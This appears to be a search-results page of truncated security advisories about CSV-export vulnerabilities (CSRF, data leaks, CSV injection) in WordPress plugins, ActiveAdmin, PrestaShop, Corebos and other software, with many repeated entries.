Cross site request forgery (csrf)

The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a C...

CVE-2023-7048 My Sticky Bar <= 2.6.6 - Cross-Site Request Forgery to Sensitive Information Exposure

The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a C...

My Sticky Bar < 2.6.7 - CSV Export via CSRF to Sensitive Information Disclosure

Description The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the...

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

Code injection

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

Active Admin security vulnerability

Active Admin is Active Admin open source a Ruby on Rails framework . It is used to create a backend for website management. A security vulnerability exists in versions prior to Active Admin 2.12.0 that originated from allowing an attacker to access another user's private data by initiating a CSV...

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

CVE-2023-50448

Summary: CVE-2023-50448 affects ActiveAdmin (Ruby on Rails) before 2.12.0, where a concurrency issue in the CSV export path can let a user access data belonging to another user. The root cause is a shared, unsynchronized variable that holds the collection to be exported, allowing timing-based lea...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

Information Exposure

Overview Affected versions of this package are vulnerable to Information Exposure due to a concurrency issue that results in a shared variable not being properly synchronized. An attacker with access to the same ActiveAdmin application can obtain private data intended for another user by timing...

GHSA-356J-HG45-X525 Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

PT-2023-32697

Name of the Vulnerable Software and Affected Versions h2oai/h2o-3 affected versions not specified Description The issue allows unauthenticated users to overwrite any file accessible to the user who executes h2o.init, potentially resulting in a denial of service. Remote unauthenticated attackers c...

PT-2023-29974 · Prestashop · Orders (Csv

Name of the Vulnerable Software and Affected Versions: Orders CSV, Excel Export PRO module for PrestaShop versions prior to 5.2.0 Description: The issue allows a guest to download personal information without restriction due to a lack of permissions control. This can lead to a leak of personal...

PT-2023-30674 · Coreos · Corebos

Name of the Vulnerable Software and Affected Versions: Corebos versions 8.0 and below Description: The issue allows an attacker with low privileges to inject a malicious command into a table, which is then executed when an administrator exports the data to a CSV file and opens it, potentially...

Puppet Enterprise < 2019.8.6 Unsantized Input Vulnerability

Puppet Enterprise presented a security risk by not sanitizing user input when doing a CSV export. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. %NASLMINLEVEL 80900 C Tenable, Inc. The descriptive text in this plugin...

WP Simple Table Manager Plugin <= 1.5.6 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup. 1. Click Simple Table Manager then...

CVE-2023-41261

An issue was discovered in /fcgi/scrutfcgi.fcgi in Plixer Scrutinizer before 19.3.1. The csvExportReport endpoint action generateCSV does not require authentication and allows an unauthenticated user to export a report and access the results...